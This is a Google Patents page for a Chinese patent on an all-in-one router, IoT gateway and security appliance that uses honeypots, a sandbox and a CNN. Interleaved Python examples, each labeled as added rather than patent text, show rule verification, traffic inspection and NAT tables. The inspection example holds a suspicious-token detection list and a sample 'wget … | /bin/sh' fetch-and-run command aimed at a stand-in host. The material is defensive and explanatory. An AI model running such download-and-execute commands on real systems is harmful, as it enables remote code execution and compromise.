CN115189905B - Network communication and safety control integrated machine and working method thereof - Google Patents

Publication number: CN115189905B
Application number: CN202210499337.6A
Authority: CN (China)
Other versions: CN115189905A (en)
Other languages: Chinese (zh)
Prior art keywords: component, communication, sandbox, honeypot, internet
Legal status: Active (the legal status is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed)
Inventors: 陈贞翔, 李恩龙, 朱宇辉, 荆山, 杨波, 彭立志, 韩亚敏, 赵川
Current assignee: Quancheng Provincial Laboratory; University of Jinan (the listed assignees may be inaccurate; Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list)
Original assignee: Quancheng Provincial Laboratory; University of Jinan
Priority date, filing date and publication date: the priority date is an assumption and is not a legal conclusion; Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.

Events: application filed by Quancheng Provincial Laboratory and University of Jinan; priority to CN202210499337.6A; publication of CN115189905A; application granted; publication of CN115189905B; legal status Active (current); anticipated expiration.

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/1491 Countermeasures against malicious traffic using deception as countermeasure, e.g. honeypots, honeynets, decoys or entrapment
    • G PHYSICS
    • G16 INFORMATION AND COMMUNICATION TECHNOLOGY [ICT] SPECIALLY ADAPTED FOR SPECIFIC APPLICATION FIELDS
    • G16Y INFORMATION AND COMMUNICATION TECHNOLOGY SPECIALLY ADAPTED FOR THE INTERNET OF THINGS [IoT]
    • G16Y30/00 IoT infrastructure
    • G16Y30/10 Security thereof
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L12/00 Data switching networks
    • H04L12/28 Data switching networks characterised by path configuration, e.g. LAN [Local Area Networks] or WAN [Wide Area Networks]
    • H04L12/46 Interconnection of networks
    • H04L12/4633 Interconnection of networks using encapsulation techniques, e.g. tunneling
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/02 Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H04L63/0227 Filtering policies
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433 Vulnerability analysis
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00 Network arrangements or protocols for supporting network services or applications
    • H04L67/01 Protocols
    • H04L67/12 Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks

Abstract

The invention discloses a network communication and safety control integrated machine and a working method thereof. A local verification component receives data flowing into and out of the integrated machine and forwards it to a security component; the security component processes the data, and a routing component then forwards it. The honeypot of the honeypot sandbox linkage component monitors a communication interface and captures malicious code, and the malicious code is made to interact with the honeypot sandbox linkage component. The honeypot sandbox linkage component analyzes the traffic in its sandbox, sends it to the Internet of Things gateway component for processing, and returns the gateway component's processed response to the attacker. The honeypot sandbox linkage component analyzes the captured malicious code, extracts its software behaviors and network behaviors, and trains a convolutional neural network using those behaviors as the labels of the malicious code. The security component checks and accepts the trained network and then inspects and monitors the communication passing through the all-in-one machine with the trained convolutional neural network.

Description

Network communication and safety control integrated machine and working method thereof
Technical Field
The invention relates to the technical field of network communication and security control, in particular to a network communication and safety control integrated machine and a working method thereof.
Background
The statements in this section merely relate to the background of the present disclosure and do not necessarily constitute prior art.
The 21st century is the century of the internet's rapid development: network speed, network carrying capacity, network service quality and other network-related factors have advanced rapidly and brought great convenience to people's lives. However, malicious code spread by means of the network, which arose during that rapid development, seriously affects almost every party participating in the internet, and network security has undoubtedly become the most significant problem of the time. Nevertheless, most home users find it difficult to understand the current state of network security, let alone how to address it. Most users deploy an ordinary router at home, where the router may be connected to some home Internet of Things devices that are controlled by a separate Internet of Things gateway, and a large number of applications are installed on the terminal devices the user holds. This common scenario faces several problems that are difficult to solve.
The current mainstream home router is usually a NAT firewall with a fairly simple network management and security component added, so when a user accesses the internet through such a thin device, hidden dangers in the network environment, such as brute-force login attempts or exploits against the router, are hardly noticed. Some users may also deploy more practical Internet of Things devices at home, and these devices present security problems of their own, similar to those faced by routers. Meanwhile, the deployment of a large number of Internet of Things devices, and the expansion of possible devices or functions in the future, can lead users to purchase a dedicated Internet of Things gateway for unified management, which increases the deployment difficulty of the home network and adds points of failure for no good reason. Furthermore, applications installed on users' mobile phones may also spread malicious code to home devices.
Disclosure of Invention
To overcome the deficiencies of the prior art, the invention provides a network communication and safety control integrated machine and a working method thereof: a multi-scenario, comprehensive network communication and security management and control integrated machine comprising a router, an Internet of Things gateway and a security component. It manages all network requirements and connections of the network uniformly and in a coordinated way, and uses the advantage of connecting to many devices and the wide deployment of manufacturer devices to give ordinary users a simple, easy-to-operate, all-round integrated solution. This not only solves the problem that users are unfamiliar with and do not understand network deployment, but also reduces the number of devices a user deploys, reduces points of failure, and provides a mature and reliable security solution for the user.
In a first aspect, the invention provides a network communication and security management and control integrated machine.
The network communication and safety control all-in-one machine includes a local verification component;
the local verification component is connected to the security component;
the security component is connected to the logic framework module;
the logic framework module is connected to the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component respectively;
the security component is connected to the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component respectively;
the honeypot sandbox linkage component is connected to the honeypot, the sandbox and the data set component;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of Things related component;
the Internet of Things gateway component is connected to the honeypot sandbox linkage component.
In a second aspect, the invention provides a working method of the network communication and security management and control integrated machine.
The working method of the network communication and safety control integrated machine comprises the following steps:
the logic framework module of the all-in-one machine establishes communication connections with the security component, the user equipment component, the routing component, the Internet of Things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
the local verification component of the all-in-one machine receives data flowing into and out of the all-in-one machine and forwards it to the security component; the security component analyzes and processes the data, and the routing component then forwards it;
the Internet of Things gateway component of the all-in-one machine is in network communication with the user equipment component;
the honeypot sandbox linkage component is exposed to the external network on the routing component, and the honeypot monitors a communication interface and captures malicious code;
according to the analysis result of the security component, the malicious code is made to interact with the honeypot sandbox linkage component;
during the interaction and sample capture of the honeypot sandbox linkage component, the component transmits the traffic analyzed by the sandbox to the Internet of Things gateway component for processing and returns the gateway component's processed response to the attacker;
the honeypot sandbox linkage component analyzes the captured malicious code, extracts its software behaviors and network behaviors, and trains a convolutional neural network using those behaviors as the labels of the malicious code;
the security component checks and accepts the trained convolutional neural network and uses it to inspect and monitor the communication passing through the all-in-one machine.
Compared with the prior art, the invention has the following beneficial effects:
(1) The invention provides an integrated machine that combines an ordinary household wireless router, a modem, an Internet of Things gateway, an enterprise-grade IPS, a firewall and an AI security detection engine.
(2) The invention makes a strict division and isolation of security levels among different components, different zones and different devices. Compared with traditional security devices such as a firewall, this division is more fine-grained and comprehensive, and it supports flexible deployment and enforcement of security policies.
(3) On the basis of the traditional firewall and IPS, the integrated machine combines a machine learning model to inspect and filter network communication more flexibly and accurately, and it can lure potential and known threats against the user towards the honeypots, so that attack behavior is contained, the assets of the user's devices are protected, and the user is given sufficient time and a factual basis for taking measures. Meanwhile, the built-in sandbox can analyze captured malicious code, which greatly improves adaptability to "0-day" vulnerabilities.
(4) The integrated machine can be widely deployed, and its honeypot can strengthen its own emulation and capture capability by means of the real Internet of Things devices, which solves the problem that traditional high-interaction honeypots cannot be widely deployed because of the equipment they require. Since every machine has this capability, multi-point malicious code capture, analysis, data desensitization, feature engineering and local training of the machine learning model can be carried out in combination with the equipment manufacturer's federated learning network, and the machine learning models of all devices on the network can be fused, which removes the barriers between these processes.
Drawings
The accompanying drawings, which are included to provide a further understanding of the invention and are incorporated in and constitute a part of this specification, illustrate embodiments of the invention and together with the description serve to explain the invention.
FIG. 1 is a diagram showing the connection relationships between the internal components of the integrated machine according to the first embodiment;
FIG. 2 is an overall flow chart of the first embodiment;
FIG. 3 is a flowchart of the first-deployment operation of the all-in-one machine of the first embodiment;
FIG. 4 is a flowchart of the operation of interfacing the honeypot sandbox linkage component with the federated learning network in the all-in-one machine according to the first embodiment;
FIG. 5 is a workflow diagram of the security component's handling of incoming and outgoing traffic in the all-in-one machine of the first embodiment.
Detailed Description
It should be noted that the following detailed description is exemplary and is intended to provide further explanation of the invention. Unless defined otherwise, all technical and scientific terms used herein have the same meaning as is commonly understood by one of ordinary skill in the art to which this invention belongs.
It is noted that the terminology used herein is for the purpose of describing particular embodiments only and is not intended to limit the exemplary embodiments according to the present invention. As used herein, unless the context clearly indicates otherwise, the singular forms are also intended to include the plural forms. Furthermore, the terms "comprises" and "comprising" and any variations thereof are intended to cover non-exclusive inclusion: a process, method, system, product or device that comprises a series of steps or units is not necessarily limited to those steps or units expressly listed, but may include other steps or units that are not expressly listed or that are inherent to such a process, method, product or device.
The embodiments of the invention and the features of the embodiments may be combined with each other where they do not conflict.
All data acquisition in the embodiment is legal application of the data on the basis of meeting laws and regulations and agreements of users.
Example 1
This embodiment provides a network communication and safety control integrated machine.
As shown in FIG. 1, the network communication and security management and control integrated machine includes a local verification component;
the local verification component is connected to the security component;
the security component is connected to the logic framework module;
the logic framework module is connected to the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component respectively;
the security component is connected to the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component respectively;
the honeypot sandbox linkage component is connected to the honeypot, the sandbox and the data set component;
the user equipment component is in network communication with the routing component;
the routing component is in network communication with the Internet of Things related component;
the Internet of Things gateway component is connected to the honeypot sandbox linkage component.
Further, the local verification component consists of a grammar rule checker, a hash value checker, a version checker and a file format checker, and it checks whether the obtained rule base is complete, whether it has been tampered with, and whether it meets the local deployment requirements.
The rule base is preset by the manufacturer and contains a number of capture rules for known malicious traffic.
The local verification component first uses the hash value checker to compute the hash value of the file and compares it with the preset value; when the two are the same, the file is shown not to have been tampered with. The version checker then examines the obtained rule base to determine its version number and update date, validates its encoding rules, and passes that information to the file format checker. Using the version information just checked, the file format checker checks whether the file format is correct, whether each data structure is correct, the amount of data, and whether the file can be merged with the local library. Once these checks are finished and the data is confirmed importable, the grammar rule checker parses and unpacks the data structure, takes out each piece of data it contains one by one, checks the grammar of each rule, and finally imports the rules into the local rule base.
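The following is an added example, not code from the patent: it runs the four checks of the local verification component in the order just described (hash value, version, file format, per-rule grammar) and imports only rules that pass. The JSON layout of the vendor file, the version and action fields, the regular-expression rule grammar and the sample rules are assumptions made for this example; the "preset" hash is computed from the constructed file so the example runs offline.

```python
import hashlib
import hmac
import json
import re

# Constructed sample rule base as a vendor might ship it; the JSON layout is an assumption.
RULE_FILE = json.dumps({
    "version": "2.1.0",
    "updated": "2022-05-01",
    "encoding": "rule-v1",
    "rules": [
        {"id": 1001, "pattern": r"GET /cgi-bin/.*\.sh", "action": "block"},
        {"id": 1002, "pattern": r"POST /login .*admin", "action": "divert"},
        {"id": 1003, "pattern": r"unbalanced (paren", "action": "block"},  # bad grammar, skipped
    ],
}, sort_keys=True).encode()

EXPECTED_SHA256 = hashlib.sha256(RULE_FILE).hexdigest()  # stands in for the vendor-preset value
LOCAL_VERSION = "2.0.3"                                    # rule base version already installed
SUPPORTED_ENCODINGS = {"rule-v1"}                          # encoding rules this machine understands
VALID_ACTIONS = {"block", "divert", "log"}


def hash_check(data, expected):
    """Hash value checker: the file counts as untampered only if its digest equals the preset."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected)


def version_check(meta, local_version):
    """Version checker: accept only a newer rule base whose encoding rules are known."""
    new = tuple(int(x) for x in meta.get("version", "0").split("."))
    old = tuple(int(x) for x in local_version.split("."))
    return new > old and meta.get("encoding") in SUPPORTED_ENCODINGS


def format_check(doc):
    """File format checker: the rule list exists, is non-empty, and every entry has the required fields."""
    rules = doc.get("rules")
    if not isinstance(rules, list) or not rules:
        return False
    return all(isinstance(r, dict) and {"id", "pattern", "action"}.issubset(r) for r in rules)


def grammar_check(rule):
    """Grammar rule checker: the pattern must compile and the action must be one the machine knows."""
    try:
        re.compile(rule["pattern"])
    except re.error:
        return False
    return isinstance(rule["id"], int) and rule["action"] in VALID_ACTIONS


def verify_and_import(data, expected_hash, local_version, local_rules):
    """Run the four checks in order; return the ids imported (empty if the file is rejected)."""
    if not hash_check(data, expected_hash):
        return []
    doc = json.loads(data)
    if not version_check(doc, local_version) or not format_check(doc):
        return []
    imported = []
    for rule in doc["rules"]:
        if grammar_check(rule):           # each rule is taken out and checked one by one
            local_rules[rule["id"]] = rule
            imported.append(rule["id"])
    return imported


if __name__ == "__main__":
    installed = {}
    print(verify_and_import(RULE_FILE, EXPECTED_SHA256, LOCAL_VERSION, installed))
```

A rule that fails the grammar check is skipped rather than rejecting the whole file; a deployment that prefers all-or-nothing imports can return an empty list on the first failure instead. Note that comparing against a preset hash only proves integrity relative to that preset: if the preset value travels over the same channel as the file, a signature over the file is the stronger check.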
Further, the security component inspects all communication flowing through the all-in-one machine, protects the machine itself, and protects the network security of the machine and its connected devices through active intervention, passive defense and communication monitoring.
Both active intervention and passive defense are based on intercepting communication: the intercepted communication is inspected using the rule base and the machine learning model, and measures are taken according to the result.
Directly blocking a threat that matches a rule is called passive defense. Forwarding a potentially malicious threat to the honeypot sandbox linkage component for analysis and then taking measures according to the analysis result is called active intervention.
Furthermore, the logic framework module provides standard operating, interaction and input/output program interfaces for the security component, the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component, and all communication among the components goes through the logic framework module.
Because the logic framework module gives the components a standard program interface, the module is easy to maintain later, and new components can be added without changing the underlying hardware architecture.
Further, the user equipment component provides access services to the user's terminal devices over a wireless or wired connection, and connecting to this component is not essentially different from connecting to a home router in the conventional sense. The slight difference is that this component only provides network access and does not itself forward data.
Further, the user equipment component maintains and manages the user equipment, where user equipment means all terminal devices a user might use, such as a mobile phone, a tablet or a computer.
The difference between the Internet of Things component and the user component is that the devices connected to the user component are devices the user handles or manages directly, whereas the devices in the Internet of Things component are mainly Internet of Things devices, which are generally not used directly by the user but provide services outward, for example a television, a refrigerator or a fan.
Furthermore, the routing component is a home router that forwards and receives all data packets on the all-in-one machine; in its working principle it is not essentially different from a layer-3 switch.
Further, the routing component is configured to forward data from the user's internal network, or perform network address translation (NAT) on it, towards the outside; to forward external data, or perform NAT on it, towards the inside; and to forward data between internal networks.
Further, the Internet of Things gateway component is an Internet of Things gateway: all Internet of Things devices connect to it over a wired or wireless connection and are managed by it.
Further, the Internet of Things gateway component maintains and manages all connected Internet of Things devices, and it identifies and uses the matching Internet of Things-specific protocol to communicate with each Internet of Things device.
Further, the honeypot sandbox linkage component interacts with suspected malicious traffic in an attempt to trap the malicious code involved in the interaction. The captured malicious code is then sent to the sandbox for analysis; the sandbox builds an analysis environment suited to the malicious code according to the code's attributes and uses that environment to obtain the malicious behavior and malicious traffic generated while the code runs, and this traffic is used to train the machine learning model and improve its recognition capability.
Example 2
This embodiment provides a working method of the network communication and safety control integrated machine.
As shown in FIG. 2, the working method of the network communication and security management and control integrated machine includes:
S201: the logic framework module of the all-in-one machine establishes communication connections with the security component, the user equipment component, the routing component, the Internet of Things related component and the honeypot sandbox linkage component to coordinate the working modes of the components;
S202: the local verification component of the all-in-one machine receives data flowing into and out of the all-in-one machine and forwards it to the security component; the security component analyzes and processes the data, and the routing component then forwards it;
S203: the Internet of Things gateway component of the all-in-one machine is in network communication with the user equipment component;
S204: the honeypot sandbox linkage component is exposed to the external network on the routing component, and the honeypot monitors a communication interface and captures malicious code;
S205: according to the analysis result of the security component, the malicious code is made to interact with the honeypot sandbox linkage component;
S206: during the interaction and sample capture of the honeypot sandbox linkage component, the component transmits the traffic analyzed by the sandbox to the Internet of Things gateway component for processing and returns the gateway component's processed response to the attacker;
S207: the honeypot sandbox linkage component analyzes the captured malicious code, extracts its software behaviors and network behaviors, and trains a convolutional neural network using those behaviors as the labels of the malicious code;
S208: the security component checks and accepts the trained convolutional neural network and uses it to inspect and monitor the communication passing through the all-in-one machine.
Further, as shown in FIG. 3, the specific steps of the first-deployment operation flow of the integrated machine are:
the integrated machine is started for the first time, loads its firmware for the first time, and reads the information of the user terminal devices that connect to it and registers them;
the device connects to the integrated machine through the configuration interface and completes the configuration of the device and of the basic network under the guided tutorial;
the user's Internet of Things devices are read and registered, and the home Internet of Things environment is built at the network level;
the machine communicates with the Internet of Things devices and, according to the authorization mode chosen by the user, helps the user configure them at the configuration level;
the machine judges whether a request for additional device data has been received; if so, it returns to the step of reading and registering the user's Internet of Things devices; if not, the device security module performs a security check of the network environment and the devices in combination with the built-in policy.
Further, the logic framework module of the all-in-one machine obtains the rule base for identifying malicious code, which the manufacturer has built in advance, from the manufacturer's remote server, and at the same time obtains a machine learning model from the federated learning network.
Further, step S201, in which the logic framework module of the all-in-one machine establishes communication connections with the security component, the user equipment component, the routing component, the Internet of Things related component and the honeypot sandbox linkage component to coordinate the working modes of the components, specifically comprises:
S2011: the logic framework module of the all-in-one machine establishes communication connections with the security component, the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component;
S2012: the security component interfaces with the routing component;
S2013: the security component interfaces with the Internet of Things related component and the user equipment component;
S2014: the honeypot sandbox linkage component interfaces with the security component and the Internet of Things gateway component;
S2015: the Internet of Things gateway component and the user equipment component interface with the routing component for network communication;
S2016: after the integrated machine has obtained the rule information, the local verification component verifies its integrity, and the current machine learning model's version and iteration state are checked against the model iteration blockchain information in the federated learning network.
Further, S2012, in which the security component interfaces with the routing component, specifically comprises:
the security component is logically positioned on a bypass of the routing component, and bypass communication is the default. When the security component fails, it switches its own working mode to bypass mode promptly, so that communication skips the security component and the normal communication of users and their devices is preserved.
Further, S2013, in which the security component interfaces with the Internet of Things related component and the user equipment component, specifically comprises:
the security component is attached to the Internet of Things gateway component and the user equipment component in a side-mounted manner; communication entering and leaving the Internet of Things gateway component and the user equipment component is redirected to the security component for analysis and evaluation before the next forwarding step continues, and bypass mode is likewise supported when the security component fails. In addition, while the security component is working normally, a device that shows abnormal behavior is isolated from the routing component at the network device level.
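The following is an added example, not code from the patent, covering the decision logic of the security component as described above: a rule match is blocked outright (passive defense), a flow the model scores as suspicious is diverted to the honeypot sandbox linkage component (active intervention), everything else is forwarded, a device whose traffic was blocked is isolated from the routing component, and a failure inside the inspection switches the component into bypass mode. The flow fields, the sample rules, the divert threshold and the token-counting stand-in for the trained CNN are all assumptions made for this example.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str      # source device address
    dst: str      # destination address
    payload: str  # application-layer data; constructed plain text for the example


# Constructed rule base of known-malicious patterns; ids and patterns are assumptions.
RULES = {
    1001: re.compile(r"GET /cgi-bin/.*\.sh"),
    1002: re.compile(r"POST /login .*admin"),
}
DIVERT_THRESHOLD = 0.6  # score at or above which a flow is sent to the honeypot sandbox (assumption)


def heuristic_score(flow):
    """Stand-in for the trained convolutional neural network: counts suspicious tokens."""
    tokens = ("wget ", "/bin/sh", "passwd", "telnet")
    hits = sum(tok in flow.payload for tok in tokens)
    return min(1.0, 0.35 * hits)


class SecurityComponent:
    def __init__(self, rules, scorer, divert_threshold=DIVERT_THRESHOLD):
        self.rules = rules
        self.scorer = scorer
        self.divert_threshold = divert_threshold
        self.bypass = False     # set once inspection has failed; traffic then skips this component
        self.isolated = set()   # devices cut off from the routing component after abnormal behavior

    def inspect(self, flow):
        """Return the measure taken for one intercepted flow."""
        if self.bypass:
            return "forward"                    # bypass mode: communication skips the security component
        if flow.src in self.isolated:
            return "drop"                       # isolated device may not reach the routing component
        try:
            for rule_id, pattern in self.rules.items():
                if pattern.search(flow.payload):
                    self.isolated.add(flow.src)  # network device level isolation of the abnormal device
                    return "block"               # passive defense: matched threat is blocked directly
            if self.scorer(flow) >= self.divert_threshold:
                return "divert"                  # active intervention: hand to honeypot sandbox linkage
            return "forward"
        except Exception:
            self.bypass = True                   # inspection failed: switch to bypass so users keep connectivity
            return "forward"


if __name__ == "__main__":
    sc = SecurityComponent(RULES, heuristic_score)
    for f in (Flow("192.168.10.5", "203.0.113.1", "GET /index.html"),
              Flow("192.168.10.7", "203.0.113.1", "wget http://example.invalid/x | /bin/sh"),
              Flow("192.168.10.9", "192.168.10.1", "GET /cgi-bin/run.sh")):
        print(f.src, "->", sc.inspect(f))
```

The bypass path is deliberately fail-open, as the description requires for availability; a deployment should therefore raise an alarm the moment `bypass` becomes true, since from then on no inspection happens until the component is restored.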
Further, S2014, in which the honeypot sandbox linkage component interfaces with the security component and the Internet of Things gateway component, specifically comprises:
the honeypot sandbox linkage component promptly bypasses communication according to the requirements of the security component, analyzes and monitors normal communication, and lures and analyzes attack communication. During analysis, the honeypot sandbox linkage component uses the real Internet of Things devices in the Internet of Things gateway component to improve its own emulation and malicious code capture capability, and the analysis also includes pre-analyzing the instructions that are to be sent to the real Internet of Things devices.
Further, S2015, in which the Internet of Things gateway component and the user equipment component interface with the routing component for network communication, specifically comprises:
ensuring that data flowing into and out of the gateway component and the user equipment component is handled appropriately by the routing component:
for communication that needs to interact with the external network, the routing component maintains a NAT forwarding table (IPv4 NAT), an IP address correspondence table (IPv4 and IPv6 dual stack) and a session mapping table (session initiation direction, session parties, time, etc.);
for communication within a component, LAN communication or VLAN forwarding is used;
for communication between components, an inter-component communication mapping table (session direction, session parties, session components, time, etc.) is maintained.
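The following is an added example, not code from the patent, showing the three cases the routing component distinguishes and the tables it keeps for them: traffic to or from the external network goes through the NAT forwarding table and is recorded in the session mapping table with its initiation direction, parties and time; traffic inside one component is handed to LAN/VLAN forwarding; traffic between two components is recorded in the inter-component communication mapping table. The address plan, the WAN address, the port allocation and the table layouts are assumptions; the IPv4/IPv6 address correspondence table is not modeled.

```python
import ipaddress

# Constructed address plan (assumption): each component owns one IPv4 subnet.
COMPONENTS = {
    "user_equipment": ipaddress.ip_network("192.168.10.0/24"),
    "iot_gateway": ipaddress.ip_network("192.168.20.0/24"),
    "honeypot_sandbox": ipaddress.ip_network("192.168.30.0/24"),
}
WAN_ADDRESS = "203.0.113.10"   # constructed public address of the all-in-one machine


def component_of(addr):
    """Name of the component that owns the address, or None for the external network."""
    ip = ipaddress.ip_address(addr)
    for name, net in COMPONENTS.items():
        if ip in net:
            return name
    return None


class RoutingComponent:
    def __init__(self):
        self.nat_table = {}        # (internal ip, internal port) -> WAN port   (IPv4 NAT forwarding table)
        self.session_table = []    # session mapping table: direction, parties, time
        self.inter_component = []  # inter-component communication mapping table
        self._next_port = 40000    # first WAN port handed out by NAT (assumption)

    def _alloc_port(self):
        port, self._next_port = self._next_port, self._next_port + 1
        return port

    def forward(self, src, sport, dst, dport, t):
        """Classify one packet and return (case, translated (ip, port) or None)."""
        src_c, dst_c = component_of(src), component_of(dst)
        if src_c is None:
            # Inbound from the external network: only packets matching NAT state are translated.
            if dst != WAN_ADDRESS:
                return ("drop", None)
            for (ip, port), wan_port in self.nat_table.items():
                if wan_port == dport:
                    self.session_table.append({"direction": "inbound", "parties": (src, ip), "time": t})
                    return ("nat_in", (ip, port))
            return ("drop", None)               # unsolicited inbound packet
        if dst_c is None:
            # Outbound to the external network: allocate or reuse a NAT mapping.
            if (src, sport) not in self.nat_table:
                self.nat_table[(src, sport)] = self._alloc_port()
            self.session_table.append({"direction": "outbound", "parties": (src, dst), "time": t})
            return ("nat_out", (WAN_ADDRESS, self.nat_table[(src, sport)]))
        if src_c == dst_c:
            return ("lan", None)                # inside one component: LAN / VLAN forwarding
        self.inter_component.append({
            "direction": f"{src_c}->{dst_c}", "parties": (src, dst),
            "components": (src_c, dst_c), "time": t,
        })
        return ("inter_component", None)


if __name__ == "__main__":
    r = RoutingComponent()
    print(r.forward("192.168.10.5", 5555, "198.51.100.7", 443, 1))
    print(r.forward("198.51.100.7", 443, WAN_ADDRESS, 40000, 2))
    print(r.forward("192.168.10.5", 1, "192.168.20.6", 2, 3))
```

The tables are what the security component would consult when it redirects or isolates a device: the inter-component mapping records which components talked to each other and when, which is the information needed to trace a flow that the honeypot sandbox later identifies as malicious.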
Further, S2016 includes: the manufacturer of the integrated machine, or the community maintaining the security component, stores the rule information usable by the rule base, and the latest machine learning model is obtained from the federated learning network.
The federated learning network is a federated learning network established and maintained by the all-in-one machine manufacturer. It receives the relevant data and information of the machine learning models of all integrated machines whose users have authorized this, performs federated learning training and model fusion on all received models, and finally obtains the fused machine learning model. During each iterative update of the model, a blockchain records the update process and information, so that the manufacturer can analyze the iteration and evolution of the model, and the integrated machine can use the same record to check and verify the machine learning model it obtains.
Further, S2011, in which the logic framework module of the all-in-one machine is communicatively connected with the security component, the user equipment component, the routing component, the Internet of Things gateway component and the honeypot sandbox linkage component, specifically comprises the following steps:
S20111: the logic framework module of the all-in-one machine establishes a network communication relationship with the routing component;
S20112: the logic framework module of the all-in-one machine establishes a network communication and security management relationship with the security component;
S20113: the logic framework module of the all-in-one machine establishes a network communication and software behaviour management relationship with the honeypot sandbox linkage component, and coordinates that relationship with the security component's interface to it;
S20114: the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the Internet of Things related components;
S20115: the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the user equipment component.
Further, S20111, in which the logic framework module of the all-in-one machine establishes a network communication relationship with the routing component, specifically comprises the following:
the logic framework module of the all-in-one machine establishes a network communication relationship with the routing component so that the routing component routes and switches all network communication entering and leaving the all-in-one machine, maintains the interfaces involved in the machine's interconnection operations, and centrally manages the interfaces towards users, towards Internet of Things devices, towards wireless access devices and towards wireless access points (APs). The routing component maintains the global routing table, the Address Resolution Protocol (ARP) table, the MAC address mapping and forwarding table, the Network Address Translation (NAT) forwarding table, the port mapping table, etc., and is also responsible for the common network services that users access, such as the Dynamic Host Configuration Protocol (DHCP) and the Domain Name System (DNS), and for the zones designated by the router.
Further, S20112, in which the logic framework module of the all-in-one machine establishes a network communication and security management relationship with the security component, specifically comprises the following:
the logic framework module of the all-in-one machine establishes a network communication and security management relationship with the security component, so that the security component inspects and monitors all communication passing through the routing component (inbound and outbound communication between the internal and external networks, and lateral communication within the internal network), while coordinating its interface with the routing component.
Further, S20114, in which the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the Internet of Things related components, specifically comprises the following:
the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the Internet of Things gateway component, so that the Internet of Things gateway component is responsible for the control and centralised communication management of all Internet of Things devices in the whole domain, interfaces with the logic framework module for device management, receives user control signalling, and coordinates its interface with the routing component.
Further, S20115, in which the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the user equipment component, specifically comprises the following:
the logic framework module of the all-in-one machine establishes a network communication and device management relationship with the user equipment component, so that the user equipment component maintains the device state of every normal Internet user device and interfaces with the logic framework module for device management, which allows users to connect to, configure and manage the all-in-one machine; it also coordinates its interface with the routing component.
Further, step S202, in which the local verification component of the all-in-one machine receives data flowing into and out of the all-in-one machine and forwards it to the security component, the security component analyses and processes the data, and the routing component then forwards it, specifically comprises the following steps:
S2021: checking whether the communication is present in the security event cache table and, if so, processing it according to the operation recorded in that table;
S2022: processing the data packets of the communication, extracting the header information of the data link layer, network layer and transport layer together with the application layer data, and comparing the header information against the rules stored in the rule base; each extracted field is matched against the rule base entries one by one, and when a field agrees with the content described by a rule (a hit), matching continues down the remaining rules;
S2023: performing application layer content inspection on the data packets that passed the rule base inspection; ciphertext is ignored, and plaintext is matched against the application layer plaintext rules of the rule base, where the application layer content comprises the application layer protocol and the content carried by the application layer;
S2024: performing dense sampling at a set ratio and logging of the communication process with NetFlow, inspecting the sampled communication data with the machine learning model in the security component, and inspecting the sampling log by means of log inspection;
S2025: when the security component encounters an abnormal condition or a security event, updating the security event cache table in the security component.
Each rule in the rule base describes one feature of a communication, such as a MAC address, IP address, port, transport layer protocol, application layer protocol or application layer content, for example in order to describe the features of a malicious communication. So that a wide variety of features can be recorded, every rule uses a unified, formatted data structure, and the database made up of these rules is called the rule base.
The operations in the security event cache table comprise forwarding, discarding, suppressing, spoofing, active intervention, monitoring, tracking and resetting:
forwarding: forwarding the data packet;
discarding: discarding the data packet;
suppressing: limiting the number of data packets forwarded per unit time;
spoofing: sending erroneous content to the source or the destination;
active intervention: attempting to transfer the communication to the honeypot sandbox linkage component and to interact with it;
monitoring: observing the communication at the flow level (data link layer, network layer, transport layer);
tracking: observing the communication at the level of the forwarded content (the transport payload, including the transport layer and the application layer);
resetting: resetting an established protocol connection using the protocol's own reset flag (for example the TCP RST flag);
The security event cache table is the security inspection cache of the security component and is aimed in particular at malicious communication detected by the machine learning model. Its fields comprise: source IP, destination IP, source port, destination port, transport layer protocol number, creation time, last hit time, maximum survival time, communication direction, scope, operation type, operation, event number, diagnosis mode and state. These describe when and where the communication occurred, the port name, protocol type and communication mode, the detection engine that was triggered, the countermeasure taken, the time the event entry was created, the time at which it is removed, and whether the event is currently valid.
NetFlow is a network protocol developed by Cisco for monitoring networks.
